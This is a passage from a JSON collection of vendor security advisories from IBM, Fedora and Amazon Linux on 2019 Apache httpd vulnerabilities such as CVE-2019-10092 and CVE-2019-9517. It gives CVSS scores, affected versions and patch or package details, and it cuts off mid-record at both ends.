vulnerable to a denial of service, caused by a memory corruption on early pushes in the mod_http2 module. By sending a specially crafted request, a remote attacker could exploit this vulnerability to cause a crash. \nCVSS Base Score: 5.3 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/165369> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)\n\n**CVEID:** [CVE-2019-10082](<https://vulners.com/cve/CVE-2019-10082>) \n**DESCRIPTION:** Apache HTTP Server could allow a remote attacker to obtain sensitive information, caused by a read-after-free in the mod_http2 module during connection shutdown. By sending specially crafted input, a remote attacker could exploit this vulnerability to obtain sensitive information. \nCVSS Base Score: 5.3 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/165368> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)\n\n**CVEID:** [CVE-2019-10092](<https://vulners.com/cve/CVE-2019-10092>) \n**DESCRIPTION:** Apache HTTP Server is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the mod_proxy error page. A remote attacker could cause the link on the error page to be malfomed and instead point to a page of their choice. An attacker could use this vulnerability to steal the victim''s cookie-based authentication credentials. \nCVSS Base Score: 4.7 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/165367> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N)\n\n**CVEID:** [CVE-2019-10097](<https://vulners.com/cve/CVE-2019-10097>) \n**DESCRIPTION:** Apache HTTP Server is vulnerable to a denial of service, caused by a stack-based buffer overflow and a NULL pointer dereference in the mod_remoteip module. By sending a specially crafted PROXY header, a remote attacker could exploit this vulnerability to overflow a buffer and cause a denial of service. \nCVSS Base Score: 5.6 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/165365> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n**CVEID:** [CVE-2019-10098](<https://vulners.com/cve/CVE-2019-10098>) \n**DESCRIPTION:** Apache HTTP Server could allow a remote attacker to conduct phishing attacks, caused by an open redirect vulnerability in the mod_rewrite module. An attacker could exploit this vulnerability using a specially-crafted URL to redirect a victim to arbitrary Web sites. \nCVSS Base Score: 3.7 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/165366> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N)\n\n## Affected Products and Versions\n\nReleases 7.4, 7.3, and 7.2 of IBM i are affected.\n\n## Remediation/Fixes\n\nThe issue can be fixed by applying a PTF to IBM i. \n\nReleases 7.4, 7.3 and 7.2 of IBM i are supported and will be fixed.\n\nThe IBM i PTF numbers are:\n\n| **IBM i 7.4** | **IBM i 7.3** | **IBM i 7.2** \n---|---|---|--- \n**CVE-2019-9517** | **SI70961** | **SI70970** | **Not affected** \n**CVE-2019-10081** | **SI70961** | **SI70970** | **Not affected** \n**CVE-2019-10082** | **SI70961** | **SI70970** | **Not affected** \n**CVE-2019-10098** | **SI71097** | **SI71052** | **SI71028** \n**CVE-2019-10092** | **SI71097** | **SI71052** | **SI71028** \n**CVE-2019-10097** | **SI71097** | **Not affected** | **Not affected** \n \n<https://www-945.ibm.com/support/fixcentral/>\n\n_**Important note:** IBM recommends that all users running unsupported versions of affected products upgrade to supported and fixed version of affected products._\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2019-12-18T14:26:38", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in the IBM i HTTP Server affect IBM i.", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10081", "CVE-2019-10082", "CVE-2019-10092", "CVE-2019-10097", "CVE-2019-10098", "CVE-2019-9517"], "modified": "2019-12-18T14:26:38", "id": "96EA3FAB46A9992B85A37D32FF04225F7EBAA1E4A838AFAAC04B90A060C0948A", "href": "https://www.ibm.com/support/pages/node/1097703", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-02-23T21:43:13", "description": "## Summary\n\nThere are multiple vulnerabilities in Apache HTTP Server affecting IBM Rational Build Forge. \n\n## Vulnerability Details\n\n**CVEID:** [CVE-2019-9517](<https://vulners.com/cve/CVE-2019-9517>) \n**DESCRIPTION:** Multiple vendors are vulnerable to a denial of service, caused by an Internal Data Buffering attack. By opening the HTTP/2 window so the peer can send without constraint and sending a stream of requests for a large response object, a remote attacker could consume excessive CPU resources. \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/165183> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n**CVEID:** [CVE-2019-10097](<https://vulners.com/cve/CVE-2019-10097>) \n**DESCRIPTION:** Apache HTTP Server is vulnerable to a denial of service, caused by a stack-based buffer overflow and a NULL pointer dereference in the mod_remoteip module. By sending a specially crafted PROXY header, a remote attacker could exploit this vulnerability to overflow a buffer and cause a denial of service. \nCVSS Base Score: 5.6 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/165365> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n**CVEID:** [CVE-2019-10081](<https://vulners.com/cve/CVE-2019-10081>) \n**DESCRIPTION:** Apache HTTP Server is vulnerable to a denial of service, caused by a memory corruption on early pushes in the mod_http2 module. By sending a specially crafted request, a remote attacker could exploit this vulnerability to cause a crash. \nCVSS Base Score: 5.3 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/165369> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)\n\n**CVEID:** [CVE-2019-10092](<https://vulners.com/cve/CVE-2019-10092>) \n**DESCRIPTION:** Apache HTTP Server is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the mod_proxy error page. A remote attacker could cause the link on the error page to be malfomed and instead point to a page of their choice. An attacker could use this vulnerability to steal the victim''s cookie-based authentication credentials. \nCVSS Base Score: 4.7 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/165367> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N)\n\n**CVEID:** [CVE-2019-10082](<https://vulners.com/cve/CVE-2019-10082>) \n**DESCRIPTION:** Apache HTTP Server could allow a remote attacker to obtain sensitive information, caused by a read-after-free in the mod_http2 module during connection shutdown. By sending specially crafted input, a remote attacker could exploit this vulnerability to obtain sensitive information. \nCVSS Base Score: 5.3 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/165368> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)\n\n**CVEID:** [CVE-2019-10098](<https://vulners.com/cve/CVE-2019-10098>) \n**DESCRIPTION:** Apache HTTP Server could allow a remote attacker to conduct phishing attacks, caused by an open redirect vulnerability in the mod_rewrite module. An attacker could exploit this vulnerability using a specially-crafted URL to redirect a victim to arbitrary Web sites. \nCVSS Base Score: 3.7 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/165366> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N)\n\n## Affected Products and Versions\n\nAffected versions: Build Forge 8.0 - 8.0.0.12\n\n## Remediation/Fixes\n\nApply the correct fix pack or iFix for your version of Build Forge:\n\n**Affected Version** | **Fix** \n---|--- \nBuild Forge 8.0 - 8.0.0.12 | Rational Build Forge 8.0.0.13 _[Download](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FRational%2FRational+Build+Forge&fixids=RationalBuildForge-8.0.0.13&source=SAR>)_. \n \n## Workarounds and Mitigations\n\nNone.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2019-09-30T12:42:18", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in Apache HTTP Server affect Rational Build Forge (CVE-2019-9517, CVE-2019-10081, CVE-2019-10082, CVE-2019-10092, CVE-2019-10097, CVE-2019-10098)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10081", "CVE-2019-10082", "CVE-2019-10092", "CVE-2019-10097", "CVE-2019-10098", "CVE-2019-9517"], "modified": "2019-09-30T12:42:18", "id": "BFF89C15B535EBBB3357938F3490EF4BD8E51EFAAA3AD2539FF46CE98385B88B", "href": "https://www.ibm.com/support/pages/node/1075233", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "fedora": [{"lastseen": "2021-07-28T14:46:51", "description": "This module manages common properties of domains for one or more virtual hosts. Specifically it can use the ACME protocol (RFC Draft) to automate certificate provisioning. These will be configured for managed domains and their virtual hosts automatically. This includes renewal of certificates before they expire. ", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-08-23T01:27:58", "type": "fedora", "title": "[SECURITY] Fedora 30 Update: mod_md-2.0.8-2.fc30", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10092", "CVE-2019-10097", "CVE-2019-10098"], "modified": "2019-08-23T01:27:58", "id": "FEDORA:973BC60CDD88", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/4Q3VMBINKQZAQWXDDMQCNJMYJHPT5R46/", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:46:51", "description": "The Apache HTTP Server is a powerful, efficient, and extensible web server. ", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-09-30T01:39:18", "type": "fedora", "title": "[SECURITY] Fedora 29 Update: httpd-2.4.41-1.fc29", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10092", "CVE-2019-10097", "CVE-2019-10098"], "modified": "2019-09-30T01:39:18", "id": "FEDORA:2F93B6076D15", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/4D7F2KSXHKQ4Q65CCDUQLUXR6XYIGAZ2/", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:46:51", "description": "This module manages common properties of domains for one or more virtual hosts. Specifically it can use the ACME protocol (RFC Draft) to automate certificate provisioning. These will be configured for managed domains and their virtual hosts automatically. This includes renewal of certificates before they expire. ", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-09-30T01:39:18", "type": "fedora", "title": "[SECURITY] Fedora 29 Update: mod_md-2.0.8-3.fc29", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10092", "CVE-2019-10097", "CVE-2019-10098"], "modified": "2019-09-30T01:39:18", "id": "FEDORA:CF92F602C6D5", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/XADU57XODT5FG4Q2UKBR6ZDM4LVYF3XR/", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:46:51", "description": "The Apache HTTP Server is a powerful, efficient, and extensible web server. ", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-08-23T01:27:58", "type": "fedora", "title": "[SECURITY] Fedora 30 Update: httpd-2.4.41-1.fc30", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10092", "CVE-2019-10097", "CVE-2019-10098"], "modified": "2019-08-23T01:27:58", "id": "FEDORA:11D1460CADC2", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/7RVHJHTU4JN3ULCQ44F2G6LZBF2LGNTC/", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}], "amazon": [{"lastseen": "2023-06-13T15:39:07", "description": "**Issue Overview:**\n\nA cross-site scripting vulnerability was found in Apache httpd, affecting the mod_proxy error page. Under certain circumstances, a crafted link could inject content into the HTML displayed in the error page, potentially leading to client-side exploitation.(CVE-2019-10092)\n\nA vulnerability was discovered in Apache httpd, in mod_remoteip. A trusted proxy using the \"PROXY\" protocol could send specially crafted headers that can cause httpd to experience a stack buffer overflow or NULL pointer dereference, leading to a crash or other potential consequences.\\n\\nThis issue could only be exploited by configured trusted intermediate proxy servers. HTTP clients such as browsers could not exploit the vulnerability.(CVE-2019-10097)\n\nA vulnerability was discovered in Apache httpd, in mod_rewrite. Certain self-referential mod_rewrite rules could be fooled by encoded newlines, causing them to redirect to an unexpected location. An attacker could abuse this flaw in a phishing attack or as part of a client-side attack on browsers.(CVE-2019-10098)\n\n \n**Affected Packages:** \n\n\nhttpd\n\n \n**Issue Correction:** \nRun _yum update httpd_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n aarch64: \n \u00a0\u00a0\u00a0 httpd-2.4.41-1.amzn2.0.1.aarch64 \n \u00a0\u00a0\u00a0 httpd-devel-2.4.41-1.amzn2.0.1.aarch64 \n \u00a0\u00a0\u00a0 httpd-tools-2.4.41-1.amzn2.0.1.aarch64 \n \u00a0\u00a0\u00a0 mod_ssl-2.4.41-1.amzn2.0.1.aarch64 \n \u00a0\u00a0\u00a0 mod_md-2.4.41-1.amzn2.0.1.aarch64 \n \u00a0\u00a0\u00a0 mod_proxy_html-2.4.41-1.amzn2.0.1.aarch64 \n \u00a0\u00a0\u00a0 mod_ldap-2.4.41-1.amzn2.0.1.aarch64 \n \u00a0\u00a0\u00a0 mod_session-2.4.41-1.amzn2.0.1.aarch64 \n \u00a0\u00a0\u00a0 httpd-debuginfo-2.4.41-1.amzn2.0.1.aarch64 \n \n i686: \n \u00a0\u00a0\u00a0 httpd-2.4.41-1.amzn2.0.1.i686 \n \u00a0\u00a0\u00a0 httpd-devel-2.4.41-1.amzn2.0.1.i686 \n \u00a0\u00a0\u00a0 httpd-tools-2.4.41-1.amzn2.0.1.i686 \n \u00a0\u00a0\u00a0 mod_ssl-2.4.41-1.amzn2.0.1.i686 \n \u00a0\u00a0\u00a0 mod_md-2.4.41-1.amzn2.0.1.i686 \n \u00a0\u00a0\u00a0 mod_proxy_html-2.4.41-1.amzn2.0.1.i686 \n \u00a0\u00a0\u00a0 mod_ldap-2.4.41-1.amzn2.0.1.i686 \n \u00a0\u00a0\u00a0 mod_session-2.4.41-1.amzn2.0.1.i686 \n \u00a0\u00a0\u00a0 httpd-debuginfo-2.4.41-1.amzn2.0.1.i686 \n \n noarch: \n \u00a0\u00a0\u00a0 httpd-manual-2.4.41-1.amzn2.0.1.noarch \n \u00a0\u00a0\u00a0 httpd-filesystem-2.4.41-1.amzn2.0.1.noarch \n \n src: \n \u00a0\u00a0\u00a0 httpd-2.4.41-1.amzn2.0.1.src \n \n x86_64: \n \u00a0\u00a0\u00a0 httpd-2.4.41-1.amzn2.0.1.x86_64 \n \u00a0\u00a0\u00a0 httpd-devel-2.4.41-1.amzn2.0.1.x86_64 \n \u00a0\u00a0\u00a0 httpd-tools-2.4.41-1.amzn2.0.1.x86_64 \n \u00a0\u00a0\u00a0 mod_ssl-2.4.41-1.amzn2.0.1.x86_64 \n \u00a0\u00a0\u00a0 mod_md-2.4.41-1.amzn2.0.1.x86_64 \n \u00a0\u00a0\u00a0 mod_proxy_html-2.4.41-1.amzn2.0.1.x86_64 \n \u00a0\u00a0\u00a0 mod_ldap-2.4.41-1.amzn2.0.1.x86_64 \n \u00a0\u00a0\u00a0 mod_session-2.4.41-1.amzn2.0.1.x86_64 \n \u00a0\u00a0\u00a0 httpd-debuginfo-2.4.41-1.amzn2.0.1.x86_64 \n \n \n\n### Additional References\n\nRed Hat: [CVE-2019-10092](<https://access.redhat.com/security/cve/CVE-2019-10092>), [CVE-2019-10097](<https://access.redhat.com/security/cve/CVE-2019-10097>), [CVE-2019-10098](<https://access.redhat.com/security/cve/CVE-2019-10098>)\n\nMitre: [CVE-2019-10092](<https://vulners.com/cve/CVE-2019-10092>), [CVE-2019-10097](<https://vulners.com/cve/CVE-2019-10097>), [CVE-2019-10098](<https://vulners.com/cve/CVE-2019-10098>)\n", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-10-28T17:42:00", "type": "amazon", "title": "Medium: httpd", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10092", "CVE-2019-10097", "CVE-2019-10098"], "modified": "2019-10-30T21:07:00", "id": "ALAS2-2019-1341", "href": "https://alas.aws.amazon.com/AL2/ALAS-2019-1341.html", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-06-13T17:29:45", "description": "**Issue Overview:**\n\nA vulnerability was found in Apache httpd, in mod_http2. Under certain circumstances, HTTP/2 early pushes could lead to memory corruption, causing a server to crash.(CVE-2019-10081)\n\nA read-after-free vulnerability was discovered in Apache httpd, in mod_http2. A specially crafted http/2 client session could cause the server to read memory that was previously freed during connection shutdown, potentially leading to a crash.(CVE-2019-10082)\n\nA cross-site scripting vulnerability was found in Apache httpd, affecting the mod_proxy error page. Under certain circumstances, a crafted link could inject content into the HTML displayed in the error page, potentially leading to client-side exploitation.(CVE-2019-10092)\n\nA vulnerability was discovered in Apache httpd, in mod_remoteip. A trusted proxy using the \"PROXY\" protocol could send specially crafted headers that can cause httpd to experience a stack buffer overflow or NULL pointer dereference, leading to a crash or other potential consequences.\\n\\nThis issue could only be exploited by configured trusted intermediate proxy servers. HTTP clients such as browsers could not exploit the vulnerability.(CVE-2019-10097)\n\nA vulnerability was discovered in Apache httpd, in mod_rewrite. Certain self-referential mod_rewrite rules could be fooled by encoded newlines, causing them to redirect to an unexpected location. An attacker could abuse this flaw in a phishing attack or as part of a client-side attack on browsers.(CVE-2019-10098)\n\nSome HTTP/2 implementations are vulnerable to unconstrained interal data buffering, potentially leading to a denial of service. The attacker opens the HTTP/2 window so the peer can send without constraint; however, they leave the TCP window closed so the peer cannot actually write (many of) the bytes on the wire. The attacker then sends a stream of requests for a large response object. Depending on how the servers queue the responses, this can consume excess memory, CPU, or both.(CVE-2019-9517)\n\n \n**Affected Packages:** \n\n\nhttpd24\n\n \n**Issue Correction:** \nRun _yum update httpd24_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n \u00a0\u00a0\u00a0 mod24_ssl-2.4.41-1.88.amzn1.i686 \n \u00a0\u00a0\u00a0 mod24_proxy_html-2.4.41-1.88.amzn1.i686 \n \u00a0\u00a0\u00a0 mod24_ldap-2.4.41-1.88.amzn1.i686 \n \u00a0\u00a0\u00a0 httpd24-devel-2.4.41-1.88.amzn1.i686 \n \u00a0\u00a0\u00a0 mod24_md-2.4.41-1.88.amzn1.i686 \n \u00a0\u00a0\u00a0 httpd24-2.4.41-1.88.amzn1.i686 \n \u00a0\u00a0\u00a0 httpd24-tools-2.4.41-1.88.amzn1.i686 \n \u00a0\u00a0\u00a0 httpd24-debuginfo-2.4.41-1.88.amzn1.i686 \n \u00a0\u00a0\u00a0 mod24_session-2.4.41-1.88.amzn1.i686 \n \n noarch: \n \u00a0\u00a0\u00a0 httpd24-manual-2.4.41-1.88.amzn1.noarch \n \n src: \n \u00a0\u00a0\u00a0 httpd24-2.4.41-1.88.amzn1.src \n \n x86_64: \n \u00a0\u00a0\u00a0 mod24_ssl-2.4.41-1.88.amzn1.x86_64 \n \u00a0\u00a0\u00a0 httpd24-tools-2.4.41-1.88.amzn1.x86_64 \n \u00a0\u00a0\u00a0 mod24_ldap-2.4.41-1.88.amzn1.x86_64 \n \u00a0\u00a0\u00a0 mod24_session-2.4.41-1.88.amzn1.x86_64 \n \u00a0\u00a0\u00a0 httpd24-2.4.41-1.88.amzn1.x86_64 \n \u00a0\u00a0\u00a0 mod24_md-2.4.41-1.88.amzn1.x86_64 \n \u00a0\u00a0\u00a0 httpd24-devel-2.4.41-1.88.amzn1.x86_64 \n \u00a0\u00a0\u00a0 httpd24-debuginfo-2.4.41-1.88.amzn1.x86_64 \n \u00a0\u00a0\u00a0 mod24_proxy_html-2.4.41-1.88.amzn1.x86_64 \n \n \n\n### Additional References\n\nRed Hat: [CVE-2019-10081](<https://access.redhat.com/security/cve/CVE-2019-10081>), [CVE-2019-10082](<https://access.redhat.com/security/cve/CVE-2019-10082>), [CVE-2019-10092](<https://access.redhat.com/security/cve/CVE-2019-10092>), [CVE-2019-10097](<https://access.redhat.com/security/cve/CVE-2019-10097>), [CVE-2019-10098](<https://access.redhat.com/security/cve/CVE-2019-10098>), [CVE-2019-9517](<https://access.redhat.com/security/cve/CVE-2019-9517>)\n\nMitre: [CVE-2019-10081](<https://vulners.com/cve/CVE-2019-10081>), [CVE-2019-10082](<https://vulners.com/cve/CVE-2019-10082>), [CVE-2019-10092](<https://vulners.com/cve/CVE-2019-10092>), [CVE-2019-10097](<https://vulners.com/cve/CVE-2019-10097>), [CVE-2019-10098](<https://vulners.com/cve/CVE-2019-10098>), [CVE-2019-9517](<https://vulners.com/cve/CVE-2019-9517>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2019-10-18T23:22:00", "type": "amazon", "title": "Medium: httpd24", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10081", "CVE-2019-10082", "CVE-2019-10092", "CVE-2019-10097", "CVE-2019-10098", "CVE-2019-9517"], "modified": "2019-10-24T21:35:00", "id": "ALAS-2019-1311", "href": "https://alas.aws.amazon.com/ALAS-2019-1311.html", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "nessus": [{"lastseen": 